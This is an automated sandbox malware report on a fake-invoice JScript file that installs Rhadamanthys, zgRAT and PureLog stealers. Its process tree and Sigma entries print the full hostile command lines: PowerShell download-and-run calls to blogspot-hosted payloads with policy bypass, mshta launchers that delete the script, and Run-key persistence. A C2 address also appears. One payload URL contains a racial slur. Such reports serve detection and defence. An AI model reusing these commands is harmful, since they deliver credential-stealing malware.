Edit tour

Windows Analysis Report
invoice-1623385214 pdf.js

Overview

General Information

Sample name:	invoice-1623385214 pdf.js
Analysis ID:	1585780
MD5:	5fec78334bead5221816efc84a937f0f
SHA1:	f708455cc4917a10193d753e821f6b32b9e68a5e
SHA256:	bd4ba1a7e5dec065e1b1a6cba1a61860e607392b42dc7d500326f826cb55ec6f
Tags:	bookingjsSPAM-ITAuser-JAMESWT_MHT
Infos:

Detection

PureLog Stealer, RHADAMANTHYS, zgRAT

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Found malware configuration

JScript performs obfuscated calls to suspicious functions

Malicious sample detected (through community Yara rule)

Suricata IDS alerts for network traffic

Yara detected PureLog Stealer

Yara detected RHADAMANTHYS Stealer

Yara detected zgRAT

.NET source code contains method to dynamically call methods (often used by packers)

.NET source code references suspicious native API functions

Bypasses PowerShell execution policy

C2 URLs / IPs found in malware configuration

Checks if the current machine is a virtual machine (disk enumeration)

Creates an autostart registry key pointing to binary in C:\Windows

Creates autostart registry keys with suspicious names

Creates autostart registry keys with suspicious values (likely registry only malware)

Creates multiple autostart registry keys

Found suspicious powershell code related to unpacking or dynamic code loading

Injects a PE file into a foreign processes

JavaScript source code contains functionality to generate code involving a shell, file or stream

Loading BitLocker PowerShell Module

Sample has a suspicious name (potential lure to open the executable)

Sigma detected: Suspicious MSHTA Child Process

Sigma detected: Suspicious PowerShell Parameter Substring

Sigma detected: WScript or CScript Dropper

Suspicious execution chain found

Suspicious powershell command line found

Switches to a custom stack to bypass stack traces

Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)

Windows Scripting host queries suspicious COM object (likely to drop second stage)

Writes to foreign memory regions

Wscript starts Powershell (via cmd or directly)

AV process strings found (often used to terminate AV products)

Abnormal high CPU Usage

Allocates memory with a write watch (potentially for evading sandboxes)

Checks if the current process is being debugged

Contains functionality to call native functions

Contains functionality to read the PEB

Contains long sleeps (>= 3 min)

Creates a DirectInput object (often for capturing keystrokes)

Creates a process in suspended mode (likely to inject code)

Detected non-DNS traffic on DNS port

Detected potential crypto function

Found WSH timer for Javascript or VBS script (likely evasive script)

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

IP address seen in connection with other malware

Installs a raw input device (often for capturing keystrokes)

JA3 SSL client fingerprint seen in connection with other malware

Java / VBScript file with very long strings (likely obfuscated code)

May sleep (evasive loops) to hinder dynamic analysis

One or more processes crash

Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)

Queries sensitive Operating System Information (via WMI, Win32_ComputerSystem, often done to detect virtual machines)

Queries the volume information (name, serial number etc) of a device

Sample execution stops while process was sleeping (likely an evasion)

Searches for the Microsoft Outlook file path

Sigma detected: Change PowerShell Policies to an Insecure Level

Sigma detected: CurrentVersion Autorun Keys Modification

Sigma detected: Suspicious Powershell In Registry Run Keys

Sigma detected: Uncommon Svchost Parent Process

Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript

Suricata IDS alerts with low severity for network traffic

Uses a known web browser user agent for HTTP communication

Uses code obfuscation techniques (call, push, ret)

Very long cmdline option found, this is very uncommon (may be encrypted or packed)

Yara detected Keylogger Generic

Yara signature match

Classification

Process Tree

System is w10x64

wscript.exe (PID: 3004 cmdline: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\invoice-1623385214 pdf.js" MD5: A47CBE969EA935BDD3AB568BB126BC80)

powershell.exe (PID: 5568 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ep Bypass -c [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12;& ('{1}{0}' -f 'ex', 'I') $(irm https://7janmain.blogspot.com/////lund.pdf);Start-Sleep -Seconds 5; MD5: 04029E121A0CFA5991749937DD22A1D9)

conhost.exe (PID: 928 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

RegSvcs.exe (PID: 1880 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe" MD5: 9D352BC46709F0CB5EC974633A0C3C94)

svchost.exe (PID: 2564 cmdline: "C:\Windows\System32\svchost.exe" MD5: 1ED18311E3DA35942DB37D15FA40CC5B)

RegSvcs.exe (PID: 416 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe" MD5: 9D352BC46709F0CB5EC974633A0C3C94)

svchost.exe (PID: 2252 cmdline: "C:\Windows\System32\svchost.exe" MD5: 1ED18311E3DA35942DB37D15FA40CC5B)

RegSvcs.exe (PID: 1440 cmdline: "C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe" MD5: 3A77A4F220612FA55118FB8D7DDAE83C)

dw20.exe (PID: 4088 cmdline: dw20.exe -x -s 932 MD5: 89106D4D0BA99F770EAFE946EA81BB65)

RegSvcs.exe (PID: 6460 cmdline: "C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe" MD5: 3A77A4F220612FA55118FB8D7DDAE83C)

dw20.exe (PID: 3896 cmdline: dw20.exe -x -s 932 MD5: 89106D4D0BA99F770EAFE946EA81BB65)

MSBuild.exe (PID: 6396 cmdline: "C:\Windows\Microsoft.NET\Framework\v3.5\Msbuild.exe" MD5: 84C42D0F2C1AE761BEF884638BC1EACD)

dw20.exe (PID: 4484 cmdline: dw20.exe -x -s 776 MD5: 89106D4D0BA99F770EAFE946EA81BB65)

MSBuild.exe (PID: 2028 cmdline: "C:\Windows\Microsoft.NET\Framework\v3.5\Msbuild.exe" MD5: 84C42D0F2C1AE761BEF884638BC1EACD)

dw20.exe (PID: 4336 cmdline: dw20.exe -x -s 800 MD5: 89106D4D0BA99F770EAFE946EA81BB65)

mshta.exe (PID: 908 cmdline: C:\Windows\system32\mshta.EXE "javascript:zre=['RUN', 'powershell -ep Bypass -c [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12;(irm https://hot7jan.blogspot.com///////nigger.pdf) | . iex;Start-Sleep -Seconds 3;', 'WScript.Shell', 'Scripting.FileSystemObject']; new ActiveXObject(zre[2])[zre[0]](zre[1], 0, true);close();mgm=new ActiveXObject('Scripting.FileSystemObject');mgm.DeleteFile(WScript.ScriptFullName);" MD5: 0B4340ED812DC82CE636C00FA5C9BEF2)

powershell.exe (PID: 5764 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ep Bypass -c [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12;(irm https://hot7jan.blogspot.com///////nigger.pdf) | . iex;Start-Sleep -Seconds 3; MD5: 04029E121A0CFA5991749937DD22A1D9)

conhost.exe (PID: 1016 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

mshta.exe (PID: 3868 cmdline: "C:\Windows\system32\mshta.exe" "javascript:cfp=['RUN', 'powershell -ep Bypass -c [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12;(irm https://hot7jan.blogspot.com///////nigger.pdf) | . iex;Start-Sleep -Seconds 3;', 'WScript.Shell', 'Scripting.FileSyste MD5: 0B4340ED812DC82CE636C00FA5C9BEF2)

mshta.exe (PID: 6488 cmdline: C:\Windows\system32\mshta.EXE "javascript:zre=['RUN', 'powershell -ep Bypass -c [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12;(irm https://hot7jan.blogspot.com///////nigger.pdf) | . iex;Start-Sleep -Seconds 3;', 'WScript.Shell', 'Scripting.FileSystemObject']; new ActiveXObject(zre[2])[zre[0]](zre[1], 0, true);close();mgm=new ActiveXObject('Scripting.FileSystemObject');mgm.DeleteFile(WScript.ScriptFullName);" MD5: 0B4340ED812DC82CE636C00FA5C9BEF2)

powershell.exe (PID: 6804 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ep Bypass -c [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12;(irm https://hot7jan.blogspot.com///////nigger.pdf) | . iex;Start-Sleep -Seconds 3; MD5: 04029E121A0CFA5991749937DD22A1D9)

conhost.exe (PID: 6880 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

mshta.exe (PID: 2588 cmdline: "C:\Windows\system32\mshta.exe" "javascript:cfp=['RUN', 'powershell -ep Bypass -c [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12;(irm https://hot7jan.blogspot.com///////nigger.pdf) | . iex;Start-Sleep -Seconds 3;', 'WScript.Shell', 'Scripting.FileSyste MD5: 0B4340ED812DC82CE636C00FA5C9BEF2)

cleanup

Malware Threat Intel

Provided by

Name	Description	Attribution	Blogpost URLs	Link
Rhadamanthys	According to PCrisk, Rhadamanthys is a stealer-type malware, and as its name implies - it is designed to extract data from infected machines.At the time of writing, this malware is spread through malicious websites mirroring those of genuine software such as AnyDesk, Zoom, Notepad++, and others. Rhadamanthys is downloaded alongside the real program, thus diminishing immediate user suspicion. These sites were promoted through Google ads, which superseded the legitimate search results on the Google search engine.	Sandworm	https://0xmrmagnezi.github.io/malware%20analysis/Rhadamanthys/ https://blog.cyble.com/2023/01/12/rhadamanthys-new-stealer-spreading-through-google-ads/ https://blog.google/threat-analysis-group/ukraine-remains-russias-biggest-cyber-focus-in-2023 https://blog.sekoia.io/clickfix-tactic-the-phantom-meet/ https://blog.talosintelligence.com/highlighting-ta866-asylum-ambuscade/	https://malpedia.caad.fkie.fraunhofer.de/details/win.rhadamanthys

Name	Description	Attribution	Blogpost URLs	Link
zgRAT	zgRAT is a Remote Access Trojan malware which sometimes drops other malware such as AgentTesla malware. zgRAT has an inforstealer use which targets browser information and cryptowallets.Usually spreads by USB or phishing emails with -zip/-lnk/.bat/.xlsx attachments and so on.	No Attribution	https://bazaar.abuse.ch/browse/signature/zgRAT/ https://kcm.trellix.com/corporate/index?page=content&id=KB96190&locale=en_US https://www.cloudsek.com/blog/threat-actors-abuse-ai-generated-youtube-videos-to-spread-stealer-malware https://www.difesaesicurezza.com/cyber/cybercrime-rfq-dalla-turchia-veicola-agenttesla-e-zgrat/ https://www.fortinet.com/blog/threat-research/smokeloader-using-old-vulnerabilities	https://malpedia.caad.fkie.fraunhofer.de/details/win.zgrat

Malware Configuration

Threatname: Rhadamanthys

{"C2 url": "https://185.196.11.217:7257/6d5f5120d519e2005/jqrh3upi.r9xlf"}

Yara Signatures

Memory Dumps

Source	Rule	Description	Author
00000011.00000003.2415868995.0000000000920000.00000004.00001000.00020000.00000000.sdmp	JoeSecurity_RHADAMANTHYS	Yara detected RHADAMANTHYS Stealer	Joe Security
00000012.00000003.2416633991.0000000000910000.00000004.00001000.00020000.00000000.sdmp	JoeSecurity_RHADAMANTHYS	Yara detected RHADAMANTHYS Stealer	Joe Security
00000001.00000002.2670826550.0000018A20F80000.00000004.08000000.00040000.00000000.sdmp	JoeSecurity_zgRAT_1	Yara detected zgRAT	Joe Security
00000001.00000002.2670826550.0000018A20F80000.00000004.08000000.00040000.00000000.sdmp	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
00000001.00000002.2843464890.0000018A31C26000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
00000011.00000003.2429816528.0000000004C00000.00000004.00000001.00020000.00000000.sdmp	JoeSecurity_Keylogger_Generic	Yara detected Keylogger Generic	Joe Security
00000011.00000002.2444664958.0000000002980000.00000040.00001000.00020000.00000000.sdmp	JoeSecurity_RHADAMANTHYS	Yara detected RHADAMANTHYS Stealer	Joe Security
00000011.00000003.2430036073.0000000004E20000.00000004.00000001.00020000.00000000.sdmp	JoeSecurity_Keylogger_Generic	Yara detected Keylogger Generic	Joe Security
00000001.00000002.2843464890.0000018A3132C000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
00000006.00000002.2417486878.0000000000402000.00000040.00000400.00020000.00000000.sdmp	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
00000006.00000002.2434245295.0000000005520000.00000040.00001000.00020000.00000000.sdmp	JoeSecurity_RHADAMANTHYS	Yara detected RHADAMANTHYS Stealer	Joe Security
00000012.00000002.2423194238.0000000003000000.00000040.00001000.00020000.00000000.sdmp	JoeSecurity_RHADAMANTHYS	Yara detected RHADAMANTHYS Stealer	Joe Security
Click to see the 7 entries

Unpacked PEs

Source	Rule	Description	Author	Strings
1.2.powershell.exe.18a313ece00.1.raw.unpack	JoeSecurity_zgRAT_1	Yara detected zgRAT	Joe Security
1.2.powershell.exe.18a313ece00.1.raw.unpack	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
1.2.powershell.exe.18a20f80000.0.raw.unpack	JoeSecurity_zgRAT_1	Yara detected zgRAT	Joe Security
1.2.powershell.exe.18a20f80000.0.raw.unpack	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
1.2.powershell.exe.18a313ece00.1.unpack	JoeSecurity_zgRAT_1	Yara detected zgRAT	Joe Security
1.2.powershell.exe.18a313ece00.1.unpack	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
1.2.powershell.exe.18a20f80000.0.unpack	JoeSecurity_zgRAT_1	Yara detected zgRAT	Joe Security
1.2.powershell.exe.18a20f80000.0.unpack	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
1.2.powershell.exe.18a31d882e8.2.unpack	JoeSecurity_zgRAT_1	Yara detected zgRAT	Joe Security
1.2.powershell.exe.18a31d882e8.2.unpack	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
1.2.powershell.exe.18a31d882e8.2.unpack	MALWARE_Win_zgRAT	Detects zgRAT	ditekSHen	0x44f47:$s1: file:/// 0x44e31:$s2: {11111-22222-10009-11112} 0x44ed7:$s3: {11111-22222-50001-00000} 0x42a1e:$s4: get_Module 0x42e66:$s5: Reverse 0x421ea:$s6: BlockCopy 0x421da:$s7: ReadByte 0x44f59:$s8: 4C 00 6F 00 63 00 61 00 74 00 69 00 6F 00 6E 00 00 0B 46 00 69 00 6E 00 64 00 20 00 00 13 52 00 65 00 73 00 6F 00 75 00 72 00 63 00 65 00 41 00 00 11 56 00 69 00 72 00 74 00 75 00 61 00 6C 00 ...
6.2.RegSvcs.exe.400000.0.unpack	JoeSecurity_zgRAT_1	Yara detected zgRAT	Joe Security
6.2.RegSvcs.exe.400000.0.unpack	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
6.2.RegSvcs.exe.400000.0.unpack	MALWARE_Win_zgRAT	Detects zgRAT	ditekSHen	0x46d47:$s1: file:/// 0x46c31:$s2: {11111-22222-10009-11112} 0x46cd7:$s3: {11111-22222-50001-00000} 0x4481e:$s4: get_Module 0x44c66:$s5: Reverse 0x43fea:$s6: BlockCopy 0x43fda:$s7: ReadByte 0x46d59:$s8: 4C 00 6F 00 63 00 61 00 74 00 69 00 6F 00 6E 00 00 0B 46 00 69 00 6E 00 64 00 20 00 00 13 52 00 65 00 73 00 6F 00 75 00 72 00 63 00 65 00 41 00 00 11 56 00 69 00 72 00 74 00 75 00 61 00 6C 00 ...
17.3.svchost.exe.4e20000.7.raw.unpack	JoeSecurity_Keylogger_Generic	Yara detected Keylogger Generic	Joe Security
17.3.svchost.exe.4c00000.6.raw.unpack	JoeSecurity_Keylogger_Generic	Yara detected Keylogger Generic	Joe Security
1.2.powershell.exe.18a31d882e8.2.raw.unpack	JoeSecurity_zgRAT_1	Yara detected zgRAT	Joe Security
1.2.powershell.exe.18a31d882e8.2.raw.unpack	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
1.2.powershell.exe.18a31d882e8.2.raw.unpack	MALWARE_Win_zgRAT	Detects zgRAT	ditekSHen	0x46d47:$s1: file:/// 0x197cb7:$s1: file:/// 0x46c31:$s2: {11111-22222-10009-11112} 0x197ba1:$s2: {11111-22222-10009-11112} 0x46cd7:$s3: {11111-22222-50001-00000} 0x197c47:$s3: {11111-22222-50001-00000} 0x4481e:$s4: get_Module 0x19578e:$s4: get_Module 0x44c66:$s5: Reverse 0x195bd6:$s5: Reverse 0x43fea:$s6: BlockCopy 0x194f5a:$s6: BlockCopy 0x43fda:$s7: ReadByte 0x194f4a:$s7: ReadByte 0x46d59:$s8: 4C 00 6F 00 63 00 61 00 74 00 69 00 6F 00 6E 00 00 0B 46 00 69 00 6E 00 64 00 20 00 00 13 52 00 65 00 73 00 6F 00 75 00 72 00 63 00 65 00 41 00 00 11 56 00 69 00 72 00 74 00 75 00 61 00 6C 00 ... 0x197cc9:$s8: 4C 00 6F 00 63 00 61 00 74 00 69 00 6F 00 6E 00 00 0B 46 00 69 00 6E 00 64 00 20 00 00 13 52 00 65 00 73 00 6F 00 75 00 72 00 63 00 65 00 41 00 00 11 56 00 69 00 72 00 74 00 75 00 61 00 6C 00 ...
Click to see the 14 entries

Sigma Signatures

System Summary

Sigma detected: Suspicious MSHTA Child Process

Source: Process started

Author: Michael Haag: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ep Bypass -c [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12;(irm https://hot7jan.blogspot.com///////nigger.pdf) | . iex;Start-Sleep -Seconds 3;, CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ep Bypass -c [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12;(irm https://hot7jan.blogspot.com///////nigger.pdf) | . iex;Start-Sleep -Seconds 3;, CommandLine|base64offset|contains: , Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: C:\Windows\system32\mshta.EXE "javascript:zre=['RUN', 'powershell -ep Bypass -c [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12;(irm https://hot7jan.blogspot.com///////nigger.pdf) | . iex;Start-Sleep -Seconds 3;', 'WScript.Shell', 'Scripting.FileSystemObject']; new ActiveXObject(zre[2])[zre[0]](zre[1], 0, true);close();mgm=new ActiveXObject('Scripting.FileSystemObject');mgm.DeleteFile(WScript.ScriptFullName);", ParentImage: C:\Windows\System32\mshta.exe, ParentProcessId: 908, ParentProcessName: mshta.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ep Bypass -c [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12;(irm https://hot7jan.blogspot.com///////nigger.pdf) | . iex;Start-Sleep -Seconds 3;, ProcessId: 5764, ProcessName: powershell.exe

Sigma detected: Suspicious PowerShell Parameter Substring

Source: Process started

Author: Florian Roth (Nextron Systems), Daniel Bohannon (idea), Roberto Rodriguez (Fix): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ep Bypass -c [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12;& ('{1}{0}' -f 'ex', 'I') $(irm https://7janmain.blogspot.com/////lund.pdf);Start-Sleep -Seconds 5;, CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ep Bypass -c [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12;& ('{1}{0}' -f 'ex', 'I') $(irm https://7janmain.blogspot.com/////lund.pdf);Start-Sleep -Seconds 5;, CommandLine|base64offset|contains: , Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\invoice-1623385214 pdf.js", ParentImage: C:\Windows\System32\wscript.exe, ParentProcessId: 3004, ParentProcessName: wscript.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ep Bypass -c [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12;& ('{1}{0}' -f 'ex', 'I') $(irm https://7janmain.blogspot.com/////lund.pdf);Start-Sleep -Seconds 5;, ProcessId: 5568, ProcessName: powershell.exe

Sigma detected: WScript or CScript Dropper

Source: Process started

Author: Margaritis Dimitrios (idea), Florian Roth (Nextron Systems), oscd.community: Data: Command: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\invoice-1623385214 pdf.js", CommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\invoice-1623385214 pdf.js", CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 2580, ProcessCommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\invoice-1623385214 pdf.js", ProcessId: 3004, ProcessName: wscript.exe

Sigma detected: Change PowerShell Policies to an Insecure Level

Source: Process started

Author: frack113: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ep Bypass -c [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12;& ('{1}{0}' -f 'ex', 'I') $(irm https://7janmain.blogspot.com/////lund.pdf);Start-Sleep -Seconds 5;, CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ep Bypass -c [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12;& ('{1}{0}' -f 'ex', 'I') $(irm https://7janmain.blogspot.com/////lund.pdf);Start-Sleep -Seconds 5;, CommandLine|base64offset|contains: , Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\invoice-1623385214 pdf.js", ParentImage: C:\Windows\System32\wscript.exe, ParentProcessId: 3004, ParentProcessName: wscript.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ep Bypass -c [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12;& ('{1}{0}' -f 'ex', 'I') $(irm https://7janmain.blogspot.com/////lund.pdf);Start-Sleep -Seconds 5;, ProcessId: 5568, ProcessName: powershell.exe

Sigma detected: CurrentVersion Autorun Keys Modification

Source: Registry Key set

Author: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split): Data: Details: mshta "javascript:cfp=['RUN', 'powershell -ep Bypass -c [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12;(irm https://hot7jan.blogspot.com///////nigger.pdf) | . iex;Start-Sleep -Seconds 3;', 'WScript.Shell', 'Scripting.FileSystemObject']; new ActiveXObject(cfp[2])[cfp[0]](cfp[1], 0, true);close();cda=new ActiveXObject('Scripting.FileSystemObject');cda.DeleteFile(WScript.ScriptFullName);", EventID: 13, EventType: SetValue, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 5568, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Uplatistarlt-104

Sigma detected: Suspicious Powershell In Registry Run Keys

Source: Registry Key set

Author: frack113, Florian Roth (Nextron Systems): Data: Details: mshta "javascript:cfp=['RUN', 'powershell -ep Bypass -c [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12;(irm https://hot7jan.blogspot.com///////nigger.pdf) | . iex;Start-Sleep -Seconds 3;', 'WScript.Shell', 'Scripting.FileSystemObject']; new ActiveXObject(cfp[2])[cfp[0]](cfp[1], 0, true);close();cda=new ActiveXObject('Scripting.FileSystemObject');cda.DeleteFile(WScript.ScriptFullName);", EventID: 13, EventType: SetValue, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 5568, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Uplatistarlt-104

Sigma detected: Uncommon Svchost Parent Process

Source: Process started

Author: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\svchost.exe", CommandLine: "C:\Windows\System32\svchost.exe", CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\svchost.exe, NewProcessName: C:\Windows\SysWOW64\svchost.exe, OriginalFileName: C:\Windows\SysWOW64\svchost.exe, ParentCommandLine: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe", ParentImage: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe, ParentProcessId: 1880, ParentProcessName: RegSvcs.exe, ProcessCommandLine: "C:\Windows\System32\svchost.exe", ProcessId: 2564, ProcessName: svchost.exe

Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript

Source: Process started

Author: Michael Haag: Data: Command: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\invoice-1623385214 pdf.js", CommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\invoice-1623385214 pdf.js", CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 2580, ProcessCommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\invoice-1623385214 pdf.js", ProcessId: 3004, ProcessName: wscript.exe

Sigma detected: Non Interactive PowerShell Process Spawned

Source: Process started

Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ep Bypass -c [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12;& ('{1}{0}' -f 'ex', 'I') $(irm https://7janmain.blogspot.com/////lund.pdf);Start-Sleep -Seconds 5;, CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ep Bypass -c [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12;& ('{1}{0}' -f 'ex', 'I') $(irm https://7janmain.blogspot.com/////lund.pdf);Start-Sleep -Seconds 5;, CommandLine|base64offset|contains: , Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\invoice-1623385214 pdf.js", ParentImage: C:\Windows\System32\wscript.exe, ParentProcessId: 3004, ParentProcessName: wscript.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ep Bypass -c [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12;& ('{1}{0}' -f 'ex', 'I') $(irm https://7janmain.blogspot.com/////lund.pdf);Start-Sleep -Seconds 5;, ProcessId: 5568, ProcessName: powershell.exe

Sigma detected: Windows Processes Suspicious Parent Directory

Source: Process started

Author: vburov: Data: Command: "C:\Windows\System32\svchost.exe", CommandLine: "C:\Windows\System32\svchost.exe", CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\svchost.exe, NewProcessName: C:\Windows\SysWOW64\svchost.exe, OriginalFileName: C:\Windows\SysWOW64\svchost.exe, ParentCommandLine: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe", ParentImage: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe, ParentProcessId: 1880, ParentProcessName: RegSvcs.exe, ProcessCommandLine: "C:\Windows\System32\svchost.exe", ProcessId: 2564, ProcessName: svchost.exe

Suricata Signatures

ET MALWARE Observed Malicious Powershell Loader Payload Request (GET)

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-01-08T09:07:03.825118+0100	2047905	1	A Network Trojan was detected	192.168.2.4	49731	172.217.16.193	443	TCP
2025-01-08T09:08:18.323467+0100	2047905	1	A Network Trojan was detected	192.168.2.4	61180	142.250.185.129	443	TCP
2025-01-08T09:08:35.921864+0100	2047905	1	A Network Trojan was detected	192.168.2.4	61304	142.250.185.129	443	TCP

ETPRO MALWARE Common Downloader Header Pattern UH

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-01-08T09:07:03.825118+0100	2803274	2	Potentially Bad Traffic	192.168.2.4	49731	172.217.16.193	443	TCP
2025-01-08T09:08:18.323467+0100	2803274	2	Potentially Bad Traffic	192.168.2.4	61180	142.250.185.129	443	TCP
2025-01-08T09:08:35.921864+0100	2803274	2	Potentially Bad Traffic	192.168.2.4	61304	142.250.185.129	443	TCP

Joe Security ANOMALY Windows PowerShell HTTP activity

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-01-08T09:07:02.727501+0100	1810000	2	Potentially Bad Traffic	192.168.2.4	49730	172.217.16.193	443	TCP
2025-01-08T09:07:03.825118+0100	1810000	2	Potentially Bad Traffic	192.168.2.4	49731	172.217.16.193	443	TCP
2025-01-08T09:07:04.994588+0100	1810000	2	Potentially Bad Traffic	192.168.2.4	49732	185.166.143.50	443	TCP
